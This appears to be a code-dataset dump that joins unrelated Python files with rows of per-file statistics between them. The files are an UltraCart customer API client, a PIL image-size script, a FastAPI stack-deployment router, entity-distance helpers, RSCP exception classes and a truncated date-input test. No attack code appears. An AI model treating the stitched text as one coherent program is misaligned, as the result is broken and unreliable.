['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/customer/customers/dataTables', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DataTablesServerSideResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_email_verification_token(self, token_request, **kwargs): # noqa: E501
"""Create a token that can be used to verify a customer email address # noqa: E501
Create a token that can be used to verify a customer email address. The implementation of how a customer interacts with this token is left to the merchant. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_email_verification_token(token_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param EmailVerifyTokenRequest token_request: Token request (required)
:return: EmailVerifyTokenResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_email_verification_token_with_http_info(token_request, **kwargs) # noqa: E501
else:
(data) = self.get_email_verification_token_with_http_info(token_request, **kwargs) # noqa: E501
return data
def get_email_verification_token_with_http_info(self, token_request, **kwargs): # noqa: E501
"""Create a token that can be used to verify a customer email address # noqa: E501
Create a token that can be used to verify a customer email address. The implementation of how a customer interacts with this token is left to the merchant. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_email_verification_token_with_http_info(token_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param EmailVerifyTokenRequest token_request: Token request (required)
:return: EmailVerifyTokenResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['token_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_email_verification_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'token_request' is set
if ('token_request' not in params or
params['token_request'] is None):
raise ValueError("Missing the required parameter `token_request` when calling `get_email_verification_token`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'token_request' in params:
body_params = params['token_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/customer/customers/email_verify/get_token', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailVerifyTokenResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def insert_customer(self, customer, **kwargs): # noqa: E501
"""Insert a customer # noqa: E501
Insert a customer on the UltraCart account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.insert_customer(customer, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Customer customer: Customer to insert (required)
:param str expand: The object expansion to perform on the result. See documentation for examples
:return: CustomerResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.insert_customer_with_http_info(customer, **kwargs) # noqa: E501
else:
(data) = self.insert_customer_with_http_info(customer, **kwargs) # noqa: E501
return data
def insert_customer_with_http_info(self, customer, **kwargs): # noqa: E501
"""Insert a customer # noqa: E501
Insert a customer on the UltraCart account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.insert_customer_with_http_info(customer, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Customer customer: Customer to insert (required)
:param str expand: The object expansion to perform on the result. See documentation for examples
:return: CustomerResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['customer', 'expand'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method insert_customer" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'customer' is set
if ('customer' not in params or
params['customer'] is None):
raise ValueError("Missing the required parameter `customer` when calling `insert_customer`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'expand' in params:
query_params.append(('_expand', params['expand'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'customer' in params:
body_params = params['customer']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json; charset=UTF-8']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/customer/customers', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CustomerResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_customer(self, customer, customer_profile_oid, **kwargs): # noqa: E501
"""Update a customer # noqa: E501
Update a customer on the UltraCart account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer(customer, customer_profile_oid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Customer customer: Customer to update (required)
:param int customer_profile_oid: The customer_profile_oid to update. (required)
:param str expand: The object expansion to perform on the result. See documentation for examples
:return: CustomerResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_customer_with_http_info(customer, customer_profile_oid, **kwargs) # noqa: E501
else:
(data) = self.update_customer_with_http_info(customer, customer_profile_oid, **kwargs) # noqa: E501
return data
def update_customer_with_http_info(self, customer, customer_profile_oid, **kwargs): # noqa: E501
"""Update a customer # noqa: E501
Update a customer on the UltraCart account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_with_http_info(customer, customer_profile_oid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Customer customer: Customer to update (required)
:param int customer_profile_oid: The customer_profile_oid to update. (required)
:param str expand: The object expansion to perform on the result. See documentation for examples
:return: CustomerResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['customer', 'customer_profile_oid', 'expand'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_customer" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'customer' is set
if ('customer' not in params or
params['customer'] is None):
raise ValueError("Missing the required parameter `customer` when calling `update_customer`") # noqa: E501
# verify the required parameter 'customer_profile_oid' is set
if ('customer_profile_oid' not in params or
params['customer_profile_oid'] is None):
raise ValueError("Missing the required parameter `customer_profile_oid` when calling `update_customer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'customer_profile_oid' in params:
path_params['customer_profile_oid'] = params['customer_profile_oid'] # noqa: E501
query_params = []
if 'expand' in params:
query_params.append(('_expand', params['expand'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'customer' in params:
body_params = params['customer']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json; charset=UTF-8']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/customer/customers/{customer_profile_oid}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CustomerResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_customer_email_lists(self, customer_profile_oid, list_changes, **kwargs): # noqa: E501
"""Update email list subscriptions for a customer # noqa: E501
Update email list subscriptions for a customer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_email_lists(customer_profile_oid, list_changes, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int customer_profile_oid: The customer profile oid (required)
:param CustomerEmailListChanges list_changes: List changes (required)
:return: CustomerEmailListChanges
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_customer_email_lists_with_http_info(customer_profile_oid, list_changes, **kwargs) # noqa: E501
else:
(data) = self.update_customer_email_lists_with_http_info(customer_profile_oid, list_changes, **kwargs) # noqa: E501
return data
def update_customer_email_lists_with_http_info(self, customer_profile_oid, list_changes, **kwargs): # noqa: E501
"""Update email list subscriptions for a customer # noqa: E501
Update email list subscriptions for a customer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_email_lists_with_http_info(customer_profile_oid, list_changes, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int customer_profile_oid: The customer profile oid (required)
:param CustomerEmailListChanges list_changes: List changes (required)
:return: CustomerEmailListChanges
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['customer_profile_oid', 'list_changes'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_customer_email_lists" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'customer_profile_oid' is set
if ('customer_profile_oid' not in params or
params['customer_profile_oid'] is None):
raise ValueError("Missing the required parameter `customer_profile_oid` when calling `update_customer_email_lists`") # noqa: E501
# verify the required parameter 'list_changes' is set
if ('list_changes' not in params or
params['list_changes'] is None):
raise ValueError("Missing the required parameter `list_changes` when calling `update_customer_email_lists`") # noqa: E501
collection_formats = {}
path_params = {}
if 'customer_profile_oid' in params:
path_params['customer_profile_oid'] = params['customer_profile_oid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'list_changes' in params:
body_params = params['list_changes']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json; charset=UTF-8']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/customer/customers/{customer_profile_oid}/email_lists', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CustomerEmailListChanges', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def validate_email_verification_token(self, validation_request, **kwargs): # noqa: E501
"""Validate a token that can be used to verify a customer email address # noqa: E501
Validate a token that can be used to verify a customer email address. The implementation of how a customer interacts with this token is left to the merchant. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.validate_email_verification_token(validation_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param EmailVerifyTokenValidateRequest validation_request: Token validation request (required)
:return: EmailVerifyTokenValidateResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.validate_email_verification_token_with_http_info(validation_request, **kwargs) # noqa: E501
else:
(data) = self.validate_email_verification_token_with_http_info(validation_request, **kwargs) # noqa: E501
return data
def validate_email_verification_token_with_http_info(self, validation_request, **kwargs): # noqa: E501
"""Validate a token that can be used to verify a customer email address # noqa: E501
Validate a token that can be used to verify a customer email address. The implementation of how a customer interacts with this token is left to the merchant. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.validate_email_verification_token_with_http_info(validation_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param EmailVerifyTokenValidateRequest validation_request: Token validation request (required)
:return: EmailVerifyTokenValidateResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['validation_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method validate_email_verification_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'validation_request' is set
if ('validation_request' not in params or
params['validation_request'] is None):
raise ValueError("Missing the required parameter `validation_request` when calling `validate_email_verification_token`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'validation_request' in params:
body_params = params['validation_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/customer/customers/email_verify/validate_token', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailVerifyTokenValidateResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 45.358681
| 637
| 0.641915
| 7,865
| 67,403
| 5.250858
| 0.035728
| 0.046685
| 0.033125
| 0.022665
| 0.94099
| 0.920069
| 0.904693
| 0.880527
| 0.870769
| 0.86319
| 0
| 0.015495
| 0.274231
| 67,403
| 1,485
| 638
| 45.389226
| 0.828717
| 0.370889
| 0
| 0.736776
| 1
| 0
| 0.231439
| 0.066301
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035264
| false
| 0
| 0.006297
| 0
| 0.093199
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
30654c926d1459259843912dc598b58c69cdfb28
| 271
|
py
|
Python
|
images/check.py
|
rehan141196/rehan141196.github.io
|
a5109a0cbb12b76bbc35c39fc705f0886b7309b0
|
[
"CC-BY-3.0"
] | null | null | null |
images/check.py
|
rehan141196/rehan141196.github.io
|
a5109a0cbb12b76bbc35c39fc705f0886b7309b0
|
[
"CC-BY-3.0"
] | null | null | null |
images/check.py
|
rehan141196/rehan141196.github.io
|
a5109a0cbb12b76bbc35c39fc705f0886b7309b0
|
[
"CC-BY-3.0"
] | null | null | null |
from PIL import Image
im = Image.open('bg2.jpg')
width, height = im.size
print(width)
print(height)
im = Image.open('IMG_1800.jpg')
width, height = im.size
print(width)
print(height)
im = Image.open('IMG_1801.jpg')
width, height = im.size
print(width)
print(height)
| 14.263158
| 31
| 0.712177
| 45
| 271
| 4.244444
| 0.333333
| 0.209424
| 0.172775
| 0.251309
| 0.790576
| 0.790576
| 0.790576
| 0.790576
| 0.790576
| 0.575916
| 0
| 0.038298
| 0.132841
| 271
| 19
| 32
| 14.263158
| 0.774468
| 0
| 0
| 0.692308
| 0
| 0
| 0.113971
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.076923
| 0
| 0.076923
| 0.461538
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
30725ff719d18a99449456d2557a01627db23399
| 7,107
|
py
|
Python
|
sld-api-backend/api_v1/endpoints/stacks.py
|
guorenxi/Stack-Lifecycle-Deployment
|
2780441cb692392993116cf94c14a94ae8edbc6c
|
[
"MIT"
] | null | null | null |
sld-api-backend/api_v1/endpoints/stacks.py
|
guorenxi/Stack-Lifecycle-Deployment
|
2780441cb692392993116cf94c14a94ae8edbc6c
|
[
"MIT"
] | null | null | null |
sld-api-backend/api_v1/endpoints/stacks.py
|
guorenxi/Stack-Lifecycle-Deployment
|
2780441cb692392993116cf94c14a94ae8edbc6c
|
[
"MIT"
] | null | null | null |
from sqlalchemy.orm import Session
from fastapi import APIRouter, Depends, HTTPException
from schemas import schemas
from security import deps
from crud import user as crud_users
from crud import stacks as crud_stacks
from crud import activityLogs as crud_activity
from helpers.push_task import sync_git, sync_get_vars
from helpers.get_data import check_providers
router = APIRouter()
@router.post("/", response_model=schemas.Stack)
def create_new_stack(
stack: schemas.StackCreate,
current_user: schemas.User = Depends(deps.get_current_active_user),
db: Session = Depends(deps.get_db)):
if not crud_users.is_superuser(db, current_user):
raise HTTPException(status_code=403, detail="Not enough permissions")
name = "default"
environment = "default"
squad = "squad"
branch = stack.branch
# Checkif stack name providers are supperted
check_providers(stack_name=stack.stack_name)
# Check if stack exist
db_stack = crud_stacks.get_stack_by_name(db, stack_name=stack.stack_name)
if db_stack:
raise HTTPException(
status_code=409,
detail="The stack name already exist")
# Push git task to queue squad, all workers are subscribed to this queue
task = sync_git(
stack_name=stack.stack_name,
git_repo=stack.git_repo,
branch=branch,
environment=environment,
squad=squad,
name=name)
variables_list = [i for i in task[1]['variable'].keys()]
try:
# pesrsist data in db
result = crud_stacks.create_new_stack(
db=db,
stack=stack,
user_id=current_user.id,
task_id=task[0],
var_json=task[1],
var_list=variables_list,
squad_access=stack.squad_access
)
crud_activity.create_activity_log(
db=db,
username=current_user.username,
squad=current_user.squad,
action=f'Create Stack {stack.stack_name}'
)
return result
except Exception as err:
raise HTTPException(status_code=409, detail=f"Duplicate entry {err}")
@router.patch("/{stack_id}", response_model=schemas.Stack)
def update_stack(
stack_id: int,
stack: schemas.StackCreate,
current_user: schemas.User = Depends(deps.get_current_active_user),
db: Session = Depends(deps.get_db)):
if not current_user.master:
raise HTTPException(status_code=403, detail="Not enough permissions")
name = "default"
environment = "default"
squad = "squad"
branch = stack.branch
# Checkif stack name providers are supperted
check_providers(stack_name=stack.stack_name)
# Check if stack exist
db_stack = crud_stacks.get_stack_by_name(db, stack_name=stack.stack_name)
# Push git task to queue squad, all workers are subscribed to this queue
task = sync_git(
stack_name=stack.stack_name,
git_repo=stack.git_repo,
branch=branch,
environment=environment,
squad=squad,
name=name)
variables_list = [i for i in task[1]['variable'].keys()]
try:
# pesrsist data in db
result = crud_stacks.update_stack(
db=db,
stack_id=stack_id,
stack=stack,
user_id=current_user.id,
task_id=task[0],
var_json=task[1],
var_list=variables_list,
squad_access=stack.squad_access
)
crud_activity.create_activity_log(
db=db,
username=current_user.username,
squad=current_user.squad,
action=f'Update Stack {stack.stack_name}'
)
return result
except Exception as err:
raise HTTPException(status_code=409, detail=f"Duplicate entry {err}")
@router.get("/")
async def get_all_stacks(
current_user: schemas.User = Depends(deps.get_current_active_user),
skip: int = 0,
limit: int = 100,
db: Session = Depends(deps.get_db)):
if not current_user.master:
return crud_stacks.get_all_stacks_by_squad(db=db, squad_access=current_user.squad, skip=skip, limit=limit)
return crud_stacks.get_all_stacks(db=db, squad_access=current_user.squad, skip=skip, limit=limit)
@router.get("/{stack}")
async def get_stack_by_id_or_name(
stack,
current_user: schemas.User = Depends(deps.get_current_active_user),
db: Session = Depends(deps.get_db)):
if not stack.isdigit():
result = crud_stacks.get_stack_by_name(db=db, stack_name=stack)
if result is None:
raise HTTPException(status_code=404, detail="stack id not found")
if not current_user.squad in result.squad_access and not current_user.master and not "*" in result.squad_access:
raise HTTPException(
status_code=403, detail="Not enough permissions")
return result
result = crud_stacks.get_stack_by_id(db=db, stack_id=stack)
if result is None:
raise HTTPException(status_code=404, detail="stack id not found")
if not current_user.squad in result.squad_access and not current_user.master and not "*" in result.squad_access:
raise HTTPException(status_code=403, detail="Not enough permissions")
return result
@router.delete("/{stack}")
async def delete_stack_by_id_or_name(
stack,
current_user: schemas.User = Depends(deps.get_current_active_user),
db: Session = Depends(deps.get_db)):
if not current_user.privilege:
raise HTTPException(
status_code=403, detail="Not enough permissions")
try:
if not stack.isdigit():
result = crud_stacks.get_stack_by_name(db=db, stack_name=stack)
if result is None:
raise HTTPException(status_code=404, detail="stack id not found")
if not current_user.squad in result.squad_access and not current_user.master and not "*" in result.squad_access:
raise HTTPException(
status_code=403, detail="Not enough permissions")
crud_activity.create_activity_log(
db=db,
username=current_user.username,
squad=current_user.squad,
action=f'Delete Stack {result.stack_name}'
)
return crud_stacks.delete_stack_by_name(db=db, stack_name=stack)
result = crud_stacks.get_stack_by_id(db=db, stack_id=stack)
if result is None:
raise HTTPException(status_code=404, detail="stack id not found")
if not current_user.squad in result.squad_access and not current_user.master and not "*" in result.squad_access:
raise HTTPException(status_code=403, detail="Not enough permissions")
crud_activity.create_activity_log(
db=db,
username=current_user.username,
squad=current_user.squad,
action=f'Delete Stack {result.id}'
)
return crud_stacks.delete_stack_by_id(db=db, stack_id=stack)
except Exception as err:
return err
| 37.803191
| 124
| 0.660335
| 934
| 7,107
| 4.799786
| 0.122056
| 0.071158
| 0.07495
| 0.087441
| 0.856792
| 0.840732
| 0.810172
| 0.810172
| 0.798126
| 0.785412
| 0
| 0.009826
| 0.255382
| 7,107
| 187
| 125
| 38.005348
| 0.837302
| 0.043478
| 0
| 0.714286
| 0
| 0
| 0.073796
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012422
| false
| 0
| 0.055901
| 0
| 0.124224
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
061ad66bb9809acdbb52bf98c74869e3a3c00525
| 1,737
|
py
|
Python
|
cdr-glove_Z/LF_Configs/distanceMeasures.py
|
vinaytejakoona/MTP
|
424adf334a45dc3e67454db205ffeb1107f9f504
|
[
"MIT"
] | null | null | null |
cdr-glove_Z/LF_Configs/distanceMeasures.py
|
vinaytejakoona/MTP
|
424adf334a45dc3e67454db205ffeb1107f9f504
|
[
"MIT"
] | null | null | null |
cdr-glove_Z/LF_Configs/distanceMeasures.py
|
vinaytejakoona/MTP
|
424adf334a45dc3e67454db205ffeb1107f9f504
|
[
"MIT"
] | null | null | null |
import numpy as np
def distanceCDfar(c):
dist = 0
chem_start, chem_end = c.chemical.get_word_start(), c.chemical.get_word_end()
dis_start, dis_end = c.disease.get_word_start(), c.disease.get_word_end()
if dis_start < chem_start:
dist = chem_start - dis_end
else:
dist = dis_start - chem_end
return dist/5000
def distanceCD(c):
dist = 0
chem_start, chem_end = c.chemical.get_word_start(), c.chemical.get_word_end()
dis_start, dis_end = c.disease.get_word_start(), c.disease.get_word_end()
if dis_start < chem_start:
dist = chem_start - dis_end
else:
dist = dis_start - chem_end
return (5000 - dist)/5000
def distanceCD_(c,l):
dist = []
for w in l:
pattern = r'({{A}})(.*)('+w+r')(.*)({{B}})'
matchObj = re.search(pattern, get_tagged_text(c), flags=re.I)
if(matchObj):
match_groups = matchObj.group(2,4)
dist.append(min([len(mg) for mg in match_groups]))
if(len(dist)>0):
return (5000-max(dist))/5000
return 0
def distanceDC_(c,l):
dist = []
for w in l:
pattern = r'({{B}})(.*)('+w+r')(.*)({{A}})'
matchObj = re.search(pattern, get_tagged_text(c), flags=re.I)
if(matchObj):
match_groups = matchObj.group(2,4)
dist.append(min([len(mg) for mg in match_groups]))
if(len(dist)>0):
return (5000-max(dist))/5000
return 0
def distanceDevFol(c):
dist = 1000
matchObj = re.search(r'(develop)(.*)({{B}})(.*)(following)(.*)({{A}})', get_tagged_text(c), flags=re.I)
if(matchObj):
match_groups = matchObj.group(2,4,6)
dist = min([len(mg) for mg in match_groups])
return (5000-dist)/5000
| 32.166667
| 107
| 0.592976
| 261
| 1,737
| 3.754789
| 0.203065
| 0.057143
| 0.04898
| 0.065306
| 0.863265
| 0.820408
| 0.820408
| 0.820408
| 0.793878
| 0.75102
| 0
| 0.040243
| 0.241796
| 1,737
| 54
| 108
| 32.166667
| 0.703872
| 0
| 0
| 0.729167
| 0
| 0
| 0.054085
| 0.026467
| 0
| 0
| 0
| 0
| 0
| 1
| 0.104167
| false
| 0
| 0.020833
| 0
| 0.270833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0626bdcfa5ddac4517acac3468288126ed43d15a
| 826
|
py
|
Python
|
e3dc/_rscp_exceptions.py
|
MatrixCrawler/python-e3dc-module
|
e10885be565f9fcd945058630268d3b13afa4bd4
|
[
"MIT"
] | 4
|
2020-10-12T13:36:03.000Z
|
2020-12-23T11:53:06.000Z
|
e3dc/_rscp_exceptions.py
|
MatrixCrawler/python-e3dc-module
|
e10885be565f9fcd945058630268d3b13afa4bd4
|
[
"MIT"
] | 1
|
2020-11-22T19:36:38.000Z
|
2020-12-01T22:03:53.000Z
|
e3dc/_rscp_exceptions.py
|
MatrixCrawler/python-e3dc-module
|
e10885be565f9fcd945058630268d3b13afa4bd4
|
[
"MIT"
] | 3
|
2019-12-19T17:37:37.000Z
|
2021-12-04T18:47:43.000Z
|
from logging import Logger
class RSCPFrameError(Exception):
def __init__(self, message: str, logger: Logger):
if message is None:
message = self.__class__.__name__
logger.exception(message)
class RSCPDataError(Exception):
def __init__(self, message: str, logger: Logger):
if message is None:
message = self.__class__.__name__
logger.exception(message)
class RSCPAuthenticationError(Exception):
def __init__(self, message: str, logger: Logger):
if message is None:
message = self.__class__.__name__
logger.exception(message)
class RSCPCommunicationError(Exception):
def __init__(self, message, logger: Logger):
if message is None:
message = self.__class__.__name__
logger.exception(message)
| 27.533333
| 53
| 0.673123
| 87
| 826
| 5.83908
| 0.218391
| 0.094488
| 0.125984
| 0.15748
| 0.80315
| 0.75
| 0.75
| 0.75
| 0.75
| 0.75
| 0
| 0
| 0.245763
| 826
| 29
| 54
| 28.482759
| 0.815409
| 0
| 0
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.190476
| false
| 0
| 0.047619
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0642e7a812ca4995cae9f13f939a06020f9dbb67
| 3,815
|
py
|
Python
|
FlightBooking/tests/booking_app/test_date_input_utils.py
|
davewalker5/FlightBooking
|
6e5d1bb83789415edb2f9f35404eb0e5bf773111
|
[
"MIT"
] | null | null | null |
FlightBooking/tests/booking_app/test_date_input_utils.py
|
davewalker5/FlightBooking
|
6e5d1bb83789415edb2f9f35404eb0e5bf773111
|
[
"MIT"
] | null | null | null |
FlightBooking/tests/booking_app/test_date_input_utils.py
|
davewalker5/FlightBooking
|
6e5d1bb83789415edb2f9f35404eb0e5bf773111
|
[
"MIT"
] | null | null | null |
import unittest
import datetime
from unittest.mock import patch
from src.booking_app.data_entry import input_date, input_past_date, input_future_date
class TestInputUtils(unittest.TestCase):
@patch("builtins.input", side_effect=[datetime.datetime.now().strftime("%d/%m/%Y")])
def test_now_is_a_valid_date(self, _):
# This is potentially vulnerable to failure if the tests starts at midnight and we're now in
# the next day ... choosing to treat this as an unlikely edge case
now = datetime.datetime.now().date()
d = input_date("")
self.assertTrue(isinstance(d, datetime.date))
self.assertEqual(now.day, d.day)
self.assertEqual(now.month, d.month)
self.assertEqual(now.year, d.year)
@patch("builtins.input", side_effect=["01/02/1970"])
def test_historical_date_is_valid(self, _):
d = input_date("")
self.assertTrue(isinstance(d, datetime.date))
self.assertEqual(1, d.day)
